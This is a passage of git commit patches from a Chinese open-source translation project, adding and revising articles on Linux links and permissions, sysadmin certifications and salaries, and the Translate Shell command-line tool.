的硬链接。(注意,硬链接是从命令行下,使用 _ln_ 的命令去创建的)。你可以找到并编辑 _MyResume_2017.doc_,然后,然后找到 _JaneDoeResume.doc_,你发现它保持了跟踪 -- 它包含了你所有的更新。 + +符号链接有点像 Windows 中的快捷方式。文件系统的入口包含一个到其它文件或者目录的路径。在很多方面,它们的工作方式和硬链接很相似,它们可以创建一个到其它文件的别名。但是,符号链接也可以像文件一样给目录创建一个别名,并且,符号链接可以指向到不同介质上的不同文件系统,而硬链接做不到这些。(注意,你可以使用带 _-s_ 选项的 _ln_ 命令去创建一个符号链接) + +### 权限 + +另一个很大的区别是文件系统对象上在 Windows 和 Linux 之中涉及的权限(文件、目录、及其它)。Windows 在文件和目录上实现了一套非常复杂的权限。例如,用户和用户组可以有权限去读取、写入、运行、修改、等等。用户和用户组可以授权访问除例外以外的目录中的所有内容,也可以不允许访问除例外的目录中的所有内容。 + +然而,大多数使用 Windows 的人并不去使用一个特定的权限;因此,当他们发现使用一套权限并且在 Linux 上是强制执行的,他们感到非常惊讶!Linux 通过使用 SELinux 或者 AppArmor 可以强制执行一套更复杂的权限。但是,大多数 Linux 安装版都使用了内置的默认权限。 + +在默认的权限中,文件系统中的每个条目都有一套为它的文件所有者、文件所在的组、和其它人的权限。这些权限允许他们:读取、写入、和运行。给它们的权限有一个层次。首先,它检查这个(登入的)用户是否为该文件所有者和它拥有的权限。如果不是,然后检查这个用户是否在文件所在的组中和它拥有的权限。如果不是,然后它再检查其它人拥有的权限。这里设置了其它人的权限。但是,这里设置的三套权限大多数情况下都会使用其中的一套。 + +如果你使用命令行,你输入 `ls -l`,你可以看到如下所表示的权限: + +``` +rwxrw-r-- 1 stan dndgrp 25 Oct 33rd 25:01 rolldice.sh +``` + +最前面的字母,`rwxrw-r--`,展示了权限。在这个例子中,所有者(stan)可以读取、写入、和运行这个文件(前面的三个字母,rwx);dndgrp 组的成员可以读取和写入这个文件,但是不能运行(第二组的三个字母,rw-);其它人仅可以读取这个文件(最后的三个字母,r--)。 + +(注意,在 Windows 中去生成一个可运行的脚本,你生成的文件有一个特定的扩展名,比如 .bat,而在 Linux 中,扩展名在操作系统中没有任何意义。而是需要去设置这个文件可运行的权限) + +如果你收到一个 _permission denied_ 错误,可能是你去尝试运行了一个要求管理员权限的程序或者命令,或者你去尝试访问一个你的帐户没有访问权限的文件。如果你尝试去做一些要求管理员权限的事,你必须切换登入到一个被称为 _root_ 的用户帐户。或者通过使用一个命令行的被称为 _sudo_ 的助理程序。它可以临时允许你以 _root_ 权限运行。当然,_sudo_ 工具,也会要求你输入密码,以确保你真的有权限。 + +### 硬盘文件系统 + +Windows 主要使用一个被称为 `NTFS` 的硬盘文件系统。在 Linux 上,你也可以选一个你希望去使用的硬盘文件系统。不同的文件系统类型呈现不同的特性和不同的性能特征。主要的原生 Linux 的文件系统,现在使用的是 Ext4。但是,在安装 Linux 的时候,你可以有丰富的文件系统类型可供选择,比如,Ext3(Ext4 的前任)、XFS、Btrfs、UBIFS(用于嵌入式系统)、等等。如果你不确定要使用哪一个,Ext4 是一个很好的选择。 + + _通过来自 Linux 基金会和 edX 的 ["Linux 介绍"][2] 上免费学习更多的 Linux 课程。_ + +-------------------------------------------------------------------------------- + +via: https://www.linux.com/blog/learn/intro-to-linux/2017/11/migrating-linux-disks-files-and-filesystems + +作者:[JOHN BONESIO][a] +译者:[qhwdw](https://github.com/qhwdw) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linux.com/users/johnbonesio +[1]:https://www.linux.com/licenses/category/creative-commons-zero +[2]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux +[3]:https://www.linux.com/files/images/butterflies-8075511920jpg +[4]:https://www.linux.com/blog/learn/intro-to-linux/2017/10/migrating-linux-introduction From e8db2bcab6451433883c063e80edd537f9468353 Mon Sep 17 00:00:00 2001 From: qhwdw Date: Fri, 1 Dec 2017 12:15:36 +0800 Subject: [PATCH 0109/1627] Translating by qhwdw --- sources/tech/20171109 Concurrent Servers- Part 4 - libuv.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/sources/tech/20171109 Concurrent Servers- Part 4 - libuv.md b/sources/tech/20171109 Concurrent Servers- Part 4 - libuv.md index a41fc008fa..94b98cf5c2 100644 --- a/sources/tech/20171109 Concurrent Servers- Part 4 - libuv.md +++ b/sources/tech/20171109 Concurrent Servers- Part 4 - libuv.md @@ -1,4 +1,4 @@ -[Concurrent Servers: Part 4 - libuv][17] +Translating by qhwdw [Concurrent Servers: Part 4 - libuv][17] ============================================================ This is part 4 of a series of posts on writing concurrent network servers. In this part we're going to use libuv to rewrite our server once again, and also talk about handling time-consuming tasks in callbacks using a thread pool. Finally, we're going to look under the hood of libuv for a bit to study how it wraps blocking file-system operations with an asynchronous API. From 76a23530e5dd2aa44def31d964d4b3f51d1224cb Mon Sep 17 00:00:00 2001 From: wangy325 Date: Fri, 1 Dec 2017 13:01:00 +0800 Subject: [PATCH 0110/1627] add translated doc --- ...and Certification Are Key for SysAdmins.md | 74 ------------------ ...and Certification Are Key for SysAdmins.md | 78 +++++++++++++++++++ 2 files changed, 78 insertions(+), 74 deletions(-) delete mode 100644 translated/20171124 Open Source Cloud Skills and Certification Are Key for SysAdmins.md create mode 100644 translated/tech/20171124 Open Source Cloud Skills and Certification Are Key for SysAdmins.md diff --git a/translated/20171124 Open Source Cloud Skills and Certification Are Key for SysAdmins.md b/translated/20171124 Open Source Cloud Skills and Certification Are Key for SysAdmins.md deleted file mode 100644 index a3b5e95878..0000000000 --- a/translated/20171124 Open Source Cloud Skills and Certification Are Key for SysAdmins.md +++ /dev/null @@ -1,74 +0,0 @@ - - -开源云技能和认证—系统管理员的核心竞争力 -========= - -![os jobs](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/open-house-sysadmin.jpg?itok=i5FHc3lu "os jobs") - -[2017年开源工作报告][1](以下简称“报告”)显示,具有开源云技术认证的系统管理员能获得更高的薪酬。报告遵守[CC0][2] *[译注1]*许可协议。 - -> 译注1:CC0,即知识/版权共享协议(Creative Commons Zero),任何人都可以不须经作者同意拷贝,修改,发布,甚至商用 - -报告显示53%的受访者认为系统管理员是雇主们最期望被填补的职位空缺之一,因此,具有良好(开源技能/项目经验)的系统管理员能获得更高的薪酬,但这一职位,并没想象中那么容易胜任。 - -一般来讲,系统管理员主要职责是服务器和其他电脑操作系统的安装、服务支持和维护;预防、及时处理服务中断或其他问题的出现。 - -总的来说,今年的报告发现需求最大的领域有开源云(47%),应用开发(44%),大数据(43%),开发运营和安全(42%) - -此外,报告还发现58%的人事经理计划招聘更多的开源专家,其中67%认为开源人才的需求增长会比业内其他领域更甚。那些认为开源人才将成为最大需求的单位招聘的开源人才数量较去年增加了2个百分点。 - -同时,89%的人事经理认为很难找到颇具天赋的开源人才。 - -### 为什么要获取认证 - -报告显示,对系统管理员的需求刺激着人事经理(为53%的组织机构)提供正规的培训和专业技术认证,而这一比例去年为47%。 - -对系统管理方面感兴趣的IT人才应该考虑Linux认证。随便查看几个知名的招聘网站,你就能发现:[CompTIA Linux+][3]认证是入门Linux系统管理员的必备(最高)认证,[红帽认证工程师(RHCE)][4]和[红帽认证系统管理员(RHCSA)][5]则是胜任高水平职位的主要认证。 - -戴士(Dice)[2017技术行业薪资调查][6]显示,2016年系统管理员的薪水为79,538美元,较上年下降了0.8%;系统架构师的薪水为125,946美元,同比下降4.7%。尽管如此,该调查发现“高水平专业人才仍最受欢迎,特别是那些精通支持产业转型发展所需技术的人才”。 - -在开源技术方面,HBase(一个开源的分布式数据库)技术人才的薪水在戴士2017技术行业薪资调查中排第一。在网络和数据库领域,掌握OpenVSM操作系统技术也能获得高薪。 - -### 成为出色的系统管理员 - -出色的系统管理员须在问题出现时马上处理,这意味着你必须时刻准备以应对可能出现的状况。这个职位追求“零责备的,精益的,流程或技术上交互式改进”的思维方式和善于自我完善的人格,专业系统管理员联盟董事会成员、[开源][7]上为推动系统管理实践发展的一个专业非盈利组织成员Paul English说道。成为一个系统管理员意味着“使用开源软件如Liunx,BSD甚至开源Solaris等已成定局”,他补充道。 - -English还说,现在的系统管理员较以前而言,要更多地与软件打交道,而且要能够编写脚本来协助系统管理。 - -### 展望2018 - - 根据[罗伯特·哈夫2018年技术人才薪资导览][8],预计2018年北美地区许多单位将聘请大量系统管理方面的专业人才。同时,个人软实力和领导力水平也是优秀人才的考量因素,并且越来越受到重视。 - - 报告指出:“良好的聆听能力和批判性思维能力对于理解和解决用户的问题和担忧至关重要,同时,也是IT从业者的重要技能,特别是从事服务台和桌面支持的技术人员。” - - [Linux基金会][9] *译注* 提出不同阶段的系统管理员的所需的基本技能,都包括了强大的分析能力和快速处理问题的能力。 - - 当一个系统管理员想逐渐爬上金字塔顶端,他应该还具备如下技能:系统配置的结构化方法充满兴趣,拥有解决安全问题的经验,用户身份(验证)管理的经验,与非技术人员进行非技术交流的能力,优化系统以满足最新的安全需求的能力。 - - 现在[下载][10]2017年开源工作报告。 - - - - - ------------------------ - -via: https://www.linux.com/blog/open-source-cloud-skills-and-certification-are-key-sysadmins - -作者:[ ][a] -译者:[wangy325](https://github.com/wangy325) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]: -[1]:https://www.linuxfoundation.org/blog/2017-jobs-report-highlights-demand-open-source-skills/ -[2]:https://www.linux.com/licenses/category/creative-commons-zero -[3]:https://certification.comptia.org/certifications/linux?tracking=getCertified/certifications/linux.aspx -[4]:https://www.redhat.com/en/services/certification/rhce -[5]:https://www.redhat.com/en/services/certification/rhcsa -[6]:http://marketing.dice.com/pdf/Dice_TechSalarySurvey_2017.pdf?aliId=105832232 -[7]:https://opensource.com/article/17/7/truth-about-sysadmins -[8]:https://www.roberthalf.com/salary-guide/technology -[9]:https://www.linux.com/learn/10-essential-skills-novice-junior-and-senior-sysadmins%20%20 -[10]:http://bit.ly/2017OSSjobsreport \ No newline at end of file diff --git a/translated/tech/20171124 Open Source Cloud Skills and Certification Are Key for SysAdmins.md b/translated/tech/20171124 Open Source Cloud Skills and Certification Are Key for SysAdmins.md new file mode 100644 index 0000000000..55a42f9289 --- /dev/null +++ b/translated/tech/20171124 Open Source Cloud Skills and Certification Are Key for SysAdmins.md @@ -0,0 +1,78 @@ + + +开源云技能认证—系统管理员的核心竞争力 +========= + +![os jobs](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/open-house-sysadmin.jpg?itok=i5FHc3lu "os jobs") + +[2017年开源工作报告][1](以下简称“报告”)显示,具有开源云技术认证的系统管理员往往能获得更高的薪酬。报告遵守[CC0][2] *译注1*许可协议。 + +> 译注1:CC0,即知识/版权共享协议(Creative Commons Zero),任何人都可拷贝,修改,发布,甚至商用作品而无须征求作者许可 + +报告调查的受访者中,53%认为系统管理员是雇主们最期望被填补的职位空缺之一,因此,技术娴熟的系统管理员更受青睐而收获高薪职位,但这一职位,并没想象中那么容易胜任。 + +系统管理员主要负责服务器和其他电脑操作系统的安装、服务支持和维护,及时处理服务中断和预防其他问题的出现。 + +总的来说,今年的报告指出开源领域人才需求最大的有开源云(47%),应用开发(44%),大数据(43%),开发运营和安全(42%) + +此外,报告对人事经理的调查显示,58%期望招揽更多的开源人才,67%认为开源人才的需求增长会比业内其他领域更甚。有些单位视开源人才为招聘最优选则,它们招聘的开源人才较上年增长了2个百分点。 + +同时,89%的人事经理认为很难找到颇具天赋的开源人才。 + +### 为什么要获取认证 + +报告显示,对系统管理员的需求刺激着人事经理为53%的组织/机构提供正规的培训和专业技术认证,而这一比例去年为47%。 + +对系统管理方面感兴趣的IT人才考虑获取Linux认证已成为行业规律。随便查看几个知名的招聘网站,你就能发现:[CompTIA Linux+][3]认证是入门Linux系统管理员的必备(最高)认证;如果想胜任高级别的系统管理员职位,获取[红帽认证工程师(RHCE)][4]和[红帽认证系统管理员(RHCSA)][5]则是不可或缺的。 + +戴士(Dice)[2017技术行业薪资调查][6]显示,2016年系统管理员的薪水为79,538美元,较上年下降了0.8%;系统架构师的薪水为125,946美元,同比下降4.7%。尽管如此,该调查发现“高水平专业人才仍最受欢迎,特别是那些精通支持产业转型发展所需技术的人才”。 + +在开源技术方面,HBase(一个开源的分布式数据库)技术人才的薪水在戴士2017技术行业薪资调查中排第一。在计算机网络和数据库领域,掌握OpenVSM操作系统技术也能获得高薪。 + +### 成为出色的系统管理员 + +出色的系统管理员须在问题出现时马上处理,这意味着你必须时刻准备应对可能出现的状况。这个职位追求“零责备的,精益的,流程或技术上交互式改进的”思维方式和善于自我完善的人格,成为一个系统管理员意味着“你必将与开源软件如Linux,BSD甚至开源Solaris等结下不解的羁绊”,Paul English*译注2*在[开源][7]上发文指出。 + +Paul English认为,现在的系统管理员较以前而言,要更多地与软件打交道,而且要能够编写脚本来协助系统管理。 + +>译注2:Paul English,计算机科学学士,UNIX/Linux 系统管理员,PreOS Security Inc.公司CEO,2015-2017年于为推动系统管理员发展实践的非盈利组织——专业系统管理员联盟(League of Professional System Administrator)担任董事会成员。 + +### 展望2018 + + [Robert Half 2018年技术人才薪资导览][8]预测2018年北美地区许多单位将聘用大量系统管理方面的专业人才,同时个人软实力和领导力水平作为优秀人才的考量因素,越来越受到重视。 + + 报告指出:“良好的聆听能力和批判性思维能力对于理解和解决用户的问题和担忧至关重要,也是IT从业者必须具备的重要技能,特别是从事服务台和桌面支持工作相关的技术人员。” + + 这与[Linux基金会][9] *译注3* 提出的不同阶段的系统管理员必备技能相一致,都强调了强大的分析能力和快速处理问题的能力。 + + >译注3:Linux基金会(The Linux Foundation),成立于2000年,致力于围绕开源项目构建可持续发展的生态系统,以加速开源项目的技术开发和商业应用;它是世界上最大的开源非盈利组织,在推广、保护和推进Linux发展,协同开发,维护“历史上最大的共享资源”上功勋卓越。 + + 如果想逐渐爬上系统管理员职位的金字塔上层,还应该对系统配置的结构化方法充满兴趣;且拥有解决系统安全问题的经验;用户身份验证管理的经验;与非技术人员进行非技术交流的能力;以及优化系统以满足最新的安全需求的能力。 + + [下载][10]*译注4*2017年开源工作报告全文,以获取更多信息。 + +>译注4:可能需要科学上网 + + + + +----------------------- + +via: https://www.linux.com/blog/open-source-cloud-skills-and-certification-are-key-sysadmins + +作者:[ ][a] +译者:[wangy325](https://github.com/wangy325) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[1]:https://www.linuxfoundation.org/blog/2017-jobs-report-highlights-demand-open-source-skills/ +[2]:https://www.linux.com/licenses/category/creative-commons-zero +[3]:https://certification.comptia.org/certifications/linux?tracking=getCertified/certifications/linux.aspx +[4]:https://www.redhat.com/en/services/certification/rhce +[5]:https://www.redhat.com/en/services/certification/rhcsa +[6]:http://marketing.dice.com/pdf/Dice_TechSalarySurvey_2017.pdf?aliId=105832232 +[7]:https://opensource.com/article/17/7/truth-about-sysadmins +[8]:https://www.roberthalf.com/salary-guide/technology +[9]:https://www.linux.com/learn/10-essential-skills-novice-junior-and-senior-sysadmins%20%20 +[10]:http://bit.ly/2017OSSjobsreport \ No newline at end of file From c6f0d23e2d60758253a35d225b6770d1d0f84e91 Mon Sep 17 00:00:00 2001 From: darksun Date: Fri, 1 Dec 2017 19:10:49 +0800 Subject: [PATCH 0111/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Translate=20She?= =?UTF-8?q?ll=20=E2=80=93=20A=20Tool=20To=20Use=20Google=20Translate=20Fro?= =?UTF-8?q?m=20Command=20Line=20In=20Linux?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...ogle Translate From Command Line In Linux.md | 398 ++++++++++++++++++ 1 file changed, 398 insertions(+) create mode 100644 sources/tech/20171130 Translate Shell – A Tool To Use Google Translate From Command Line In Linux.md diff --git a/sources/tech/20171130 Translate Shell – A Tool To Use Google Translate From Command Line In Linux.md b/sources/tech/20171130 Translate Shell – A Tool To Use Google Translate From Command Line In Linux.md new file mode 100644 index 0000000000..ce372709cf --- /dev/null +++ b/sources/tech/20171130 Translate Shell – A Tool To Use Google Translate From Command Line In Linux.md @@ -0,0 +1,398 @@ +Translate Shell – A Tool To Use Google Translate From Command Line In Linux +============================================================ + +I love to work and share about CLI apps since i’m very much interested on CLI applications. Basically i prefer CLI because most of the time i will be sitting in front of the black screen and it’s became habit for me to go with CLI apps instead of GUI. + +We have wrote many articles about CLI applications in past. Recently i came to know about google CLI utilities such as “Google Translator”, “Google Calendar”, and “Google Contacts”. so, i just want to share about it. + +Today we are going to discuss about “Google Translator”. I use many times in a day to know the meanings since my native language is Tamil. + +Google translate is widely used by other language speakers. + +#### What is Translate Shell + +[Translate Shell][2] (formerly known as Google Translate CLI) is a command-line translator powered by Google Translate (default), Bing Translator, Yandex.Translate and Apertium. It allows you to access to one of these translation engines right from your terminal. Translate Shell is designed work on most of the Linux distributions. + +#### How to Install Translate Shell + +We can install the Translate Shell application in three methods. + +* Download self-contained executable file + +* Manual Method + +* Via Package Manager + +#### Method-1 : Download self-contained executable file + +Just Download the self-contained executable file and move into /usr/bin directory. + +``` +$ wget git.io/trans +$ chmod +x ./trans +$ sudo mv trans /usr/bin/ +``` + +#### Method-2 : Manual Method + +Just clone the Translate Shell github repository and compile manually for any distributions. + +``` +$ git clone https://github.com/soimort/translate-shell && cd translate-shell +$ make +$ sudo make install +``` + +#### Method-3 : Via Package Manager + +Translate Shell is available in few of the distribution official repository that can be installed through package manager. + +For Debian/Ubuntu, use [APT-GET Command][3] or [APT Command][4]to install Translate Shell. + +``` +$ sudo apt-get install translate-shell +``` + +For Fedora, use [DNF Command][5] to install Translate Shell. + +``` +$ sudo dnf install translate-shell +``` + +For Arch Linux based systems, use [Yaourt Command][6] or [Packer Command][7] to install Translate Shell from AUR repository. + +``` +$ yaourt -S translate-shell +or +$ packer -S translate-shell +``` + +#### How To Use Translate Shell + +After successfully installed, open your terminal and fire the following command. Google Translate can identify the language of the source text automatically, and Translate Shell by default translates the source text into the language of your locale. + +``` +$ trans [Words] +``` + +I’m going to translated a Tamil word “நன்றி” (Nanri) to English. It’s use to thank people. + +``` +$ trans நன்றி +நன்றி +(Naṉṟi) + +Thanks + +Definitions of நன்றி +[ தமிழ் -> English ] + +noun + gratitude + நன்றி + thanks + நன்றி + +நன்றி + Thanks +``` + +Alternatively translate a word into Tamil using following command. + +``` +$ trans :ta thanks +thanks +/THaNGks/ + +நன்றி +(Naṉṟi) + +Definitions of thanks +[ English -> தமிழ் ] + +noun + நன்றி + gratitude, thanks + +thanks + நன்றி +``` + +To Translate a word into more than one language use following command (In this example, i’m going to translate a word into Tamil & Hindi). + +``` +$ trans :ta+hi thanks +thanks +/THaNGks/ + +நன்றி +(Naṉṟi) + +Definitions of thanks +[ English -> தமிழ் ] + +noun + நன்றி + gratitude, thanks + +thanks + நன்றி + +thanks +/THaNGks/ + +धन्यवाद +(dhanyavaad) + +Definitions of thanks +[ English -> हिन्दी ] + +noun + धन्यवाद + thanks, thank, gratitude, thankfulness, felicitation + +thanks + धन्यवाद, शुक्रिया +``` + +To Translate words into one argument (phrase) use following command (just quote the sentence into one argument). + +``` +$ trans :ta "what is going on your life?" +what is going on your life? + +உங்கள் வாழ்க்கையில் என்ன நடக்கிறது? +(Uṅkaḷ vāḻkkaiyil eṉṉa naṭakkiṟatu?) + +Translations of what is going on your life? +[ English -> தமிழ் ] + +what is going on your life? + உங்கள் வாழ்க்கையில் என்ன நடக்கிறது? +``` + +To Translate Translate each word alone. + +``` +$ trans :ta curios happy +curios + +ஆர்வம் +(Ārvam) + +Translations of curios +[ Română -> தமிழ் ] + +curios + ஆர்வம், அறிவாளிகள், ஆர்வமுள்ள, அறிய, ஆர்வமாக +happy +/ˈhapē/ + +சந்தோஷமாக +(Cantōṣamāka) + +Definitions of happy +[ English -> தமிழ் ] + + மகிழ்ச்சியான + happy, convivial, debonair, gay + திருப்தி உடைய + happy + +adjective + இன்பமான + happy + +happy + சந்தோஷமாக, மகிழ்ச்சி, இனிய, சந்தோஷமா +``` + +Brief Mode : By default, Translate Shell displays translations in a verbose manner. If you prefer to see only the brief information, just add -b option. + +``` +$ trans -b :ta thanks +நன்றி +``` + +Dictionary Mode : To use Translate Shell as a dictionary, just add -d option. + +``` +$ trans -d :en thanks +thanks +/THaNGks/ + +Synonyms + noun + - gratitude, appreciation, acknowledgment, recognition, credit + + exclamation + - thank you, many thanks, thanks very much, thanks a lot, thank you kindly, much obliged, much appreciated, bless you, thanks a million + +Examples + - In short, thanks for everything that makes this city great this Thanksgiving. + + - many thanks + + - There were no thanks in the letter from him, just complaints and accusations. + + - It is a joyful celebration in which Bolivians give thanks for their freedom as a nation. + + - festivals were held to give thanks for the harvest + + - The collection, as usual, received a great response and thanks is extended to all who subscribed. + + - It would be easy to dwell on the animals that Tasmania has lost, but I prefer to give thanks for what remains. + + - thanks for being so helpful + + - It came back on about half an hour earlier than predicted, so I suppose I can give thanks for that. + + - Many thanks for the reply but as much as I tried to follow your advice, it's been a bad week. + + - To them and to those who have supported the office I extend my grateful thanks . + + - We can give thanks and words of appreciation to others for their kind deeds done to us. + + - Adam, thanks for taking time out of your very busy schedule to be with us tonight. + + - a letter of thanks + + - Thank you very much for wanting to go on reading, and thanks for your understanding. + + - Gerry has received a letter of thanks from the charity for his part in helping to raise this much needed cash. + + - So thanks for your reply to that guy who seemed to have a chip on his shoulder about it. + + - Suzanne, thanks for being so supportive with your comments on my blog. + + - She has never once acknowledged my thanks , or existence for that matter. + + - My grateful thanks go to the funders who made it possible for me to travel. + + - festivals were held to give thanks for the harvest + + - All you secretaries who made it this far into the article… thanks for your patience. + + - So, even though I don't think the photos are that good, thanks for the compliments! + + - And thanks for warning us that your secret service requires a motorcade of more than 35 cars. + + - Many thanks for your advice, which as you can see, I have passed on to our readers. + + - Tom Ryan was given a bottle of wine as a thanks for his active involvement in the twinning project. + + - Mr Hill insists he has received no recent complaints and has even been sent a letter of thanks from the forum. + + - Hundreds turned out to pay tribute to a beloved former headteacher at a memorial service to give thanks for her life. + + - Again, thanks for a well written and much deserved tribute to our good friend George. + + - I appreciate your doing so, and thanks also for the compliments about the photos! + +See also + Thanks!, thank, many thanks, thanks to, thanks to you, special thanks, give thanks, thousand thanks, Many thanks!, render thanks, heartfelt thanks, thanks to this +``` + +To Translate a File using Translate Shell, use the following format. + +``` +$ trans :ta file:///home/magi/gtrans.txt +உங்கள் வாழ்க்கையில் என்ன நடக்கிறது? +``` + +To open interactive Translate Shell, run the following command. Make sure you have to specify the source language and the target language(s) before starting an interactive shell. In this example, i’m going to translate a word from English to Tamil. + +``` +$ trans -shell en:ta thanks +Translate Shell +(:q to quit) +thanks +/THaNGks/ + +நன்றி +(Naṉṟi) + +Definitions of thanks +[ English -> தமிழ் ] + +noun + நன்றி + gratitude, thanks + +thanks + நன்றி +``` + +To know the language code, just fire the following command. + +``` +$ trans -R +or +$ trans -T +┌───────────────────────┬───────────────────────┬───────────────────────┐ +│ Afrikaans - af │ Hindi - hi │ Punjabi - pa │ +│ Albanian - sq │ Hmong - hmn │ Querétaro Otomi- otq │ +│ Amharic - am │ Hmong Daw - mww │ Romanian - ro │ +│ Arabic - ar │ Hungarian - hu │ Russian - ru │ +│ Armenian - hy │ Icelandic - is │ Samoan - sm │ +│ Azerbaijani - az │ Igbo - ig │ Scots Gaelic - gd │ +│ Basque - eu │ Indonesian - id │ Serbian (Cyr...-sr-Cyrl +│ Belarusian - be │ Irish - ga │ Serbian (Latin)-sr-Latn +│ Bengali - bn │ Italian - it │ Sesotho - st │ +│ Bosnian - bs │ Japanese - ja │ Shona - sn │ +│ Bulgarian - bg │ Javanese - jv │ Sindhi - sd │ +│ Cantonese - yue │ Kannada - kn │ Sinhala - si │ +│ Catalan - ca │ Kazakh - kk │ Slovak - sk │ +│ Cebuano - ceb │ Khmer - km │ Slovenian - sl │ +│ Chichewa - ny │ Klingon - tlh │ Somali - so │ +│ Chinese Simp...- zh-CN│ Klingon (pIqaD)tlh-Qaak Spanish - es │ +│ Chinese Trad...- zh-TW│ Korean - ko │ Sundanese - su │ +│ Corsican - co │ Kurdish - ku │ Swahili - sw │ +│ Croatian - hr │ Kyrgyz - ky │ Swedish - sv │ +│ Czech - cs │ Lao - lo │ Tahitian - ty │ +│ Danish - da │ Latin - la │ Tajik - tg │ +│ Dutch - nl │ Latvian - lv │ Tamil - ta │ +│ English - en │ Lithuanian - lt │ Tatar - tt │ +│ Esperanto - eo │ Luxembourgish - lb │ Telugu - te │ +│ Estonian - et │ Macedonian - mk │ Thai - th │ +│ Fijian - fj │ Malagasy - mg │ Tongan - to │ +│ Filipino - tl │ Malay - ms │ Turkish - tr │ +│ Finnish - fi │ Malayalam - ml │ Udmurt - udm │ +│ French - fr │ Maltese - mt │ Ukrainian - uk │ +│ Frisian - fy │ Maori - mi │ Urdu - ur │ +│ Galician - gl │ Marathi - mr │ Uzbek - uz │ +│ Georgian - ka │ Mongolian - mn │ Vietnamese - vi │ +│ German - de │ Myanmar - my │ Welsh - cy │ +│ Greek - el │ Nepali - ne │ Xhosa - xh │ +│ Gujarati - gu │ Norwegian - no │ Yiddish - yi │ +│ Haitian Creole - ht │ Pashto - ps │ Yoruba - yo │ +│ Hausa - ha │ Persian - fa │ Yucatec Maya - yua │ +│ Hawaiian - haw │ Polish - pl │ Zulu - zu │ +│ Hebrew - he │ Portuguese - pt │ │ +└───────────────────────┴───────────────────────┴───────────────────────┘ +``` + +To know more options, navigate to man page. + +``` +$ man trans +``` + +-------------------------------------------------------------------------------- + +via: https://www.2daygeek.com/translate-shell-a-tool-to-use-google-translate-from-command-line-in-linux/ + +作者:[ ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.2daygeek.com +[1]:https://www.2daygeek.com/author/magesh/ +[2]:https://github.com/soimort/translate-shell +[3]:https://www.2daygeek.com/apt-get-apt-cache-command-examples-manage-packages-debian-ubuntu-systems/ +[4]:https://www.2daygeek.com/apt-command-examples-manage-packages-debian-ubuntu-systems/ +[5]:https://www.2daygeek.com/dnf-command-examples-manage-packages-fedora-system/ +[6]:https://www.2daygeek.com/install-yaourt-aur-helper-on-arch-linux/ +[7]:https://www.2daygeek.com/install-packer-aur-helper-on-arch-linux/ From c932f0bf466ab29f496e50f77928c7dd17fb98b9 Mon Sep 17 00:00:00 2001 From: darksun Date: Fri, 1 Dec 2017 19:13:53 +0800 Subject: [PATCH 0112/1627] update author info --- ... Tool To Use Google Translate From Command Line In Linux.md | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/sources/tech/20171130 Translate Shell – A Tool To Use Google Translate From Command Line In Linux.md b/sources/tech/20171130 Translate Shell – A Tool To Use Google Translate From Command Line In Linux.md index ce372709cf..dbb687f262 100644 --- a/sources/tech/20171130 Translate Shell – A Tool To Use Google Translate From Command Line In Linux.md +++ b/sources/tech/20171130 Translate Shell – A Tool To Use Google Translate From Command Line In Linux.md @@ -382,14 +382,13 @@ $ man trans via: https://www.2daygeek.com/translate-shell-a-tool-to-use-google-translate-from-command-line-in-linux/ -作者:[ ][a] +作者:[Magesh Maruthamuthu][a] 译者:[译者ID](https://github.com/译者ID) 校对:[校对者ID](https://github.com/校对者ID) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 -[a]:https://www.2daygeek.com -[1]:https://www.2daygeek.com/author/magesh/ +[a]:https://www.2daygeek.com/author/magesh/ [2]:https://github.com/soimort/translate-shell [3]:https://www.2daygeek.com/apt-get-apt-cache-command-examples-manage-packages-debian-ubuntu-systems/ [4]:https://www.2daygeek.com/apt-command-examples-manage-packages-debian-ubuntu-systems/ From f457c3289d6987ba1b5908bef3a1a4a3e0dde41d Mon Sep 17 00:00:00 2001 From: wangy325 Date: Fri, 1 Dec 2017 19:31:08 +0800 Subject: [PATCH 0113/1627] delete origin doc ..Open source.. --- ...and Certification Are Key for SysAdmins.md | 70 ------------------- 1 file changed, 70 deletions(-) delete mode 100644 sources/tech/20171124 Open Source Cloud Skills and Certification Are Key for SysAdmins.md diff --git a/sources/tech/20171124 Open Source Cloud Skills and Certification Are Key for SysAdmins.md b/sources/tech/20171124 Open Source Cloud Skills and Certification Are Key for SysAdmins.md deleted file mode 100644 index 27379cbe40..0000000000 --- a/sources/tech/20171124 Open Source Cloud Skills and Certification Are Key for SysAdmins.md +++ /dev/null @@ -1,70 +0,0 @@ -translating by wangy325... - - -Open Source Cloud Skills and Certification Are Key for SysAdmins -============================================================ - - -![os jobs](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/open-house-sysadmin.jpg?itok=i5FHc3lu "os jobs") -Sysadmins with open source skills and certification can command higher pay, according to the 2017 Open Source Jobs Report.[Creative Commons Zero][1] - -System administrator is one of the most common positions employers are looking to fill among 53 percent of respondents to the [2017 Open Source Jobs Report][3]. Consequently, sysadmins with skills in engineering can command higher salaries, as these positions are among the hardest to fill, the report finds. - -Sysadmins are generally responsible for installing, supporting, and maintaining servers or other computer systems, and planning for and responding to service outages and other problems. - -Overall, this year’s report finds the skills most in demand are open source cloud (47 percent), application development (44 percent), Big Data (43 percent) and both DevOps and security (42 percent). - -The report also finds that 58 percent of hiring managers are planning to hire more open source professionals, and 67 percent say hiring of open source professionals will increase more than in other areas of the business. 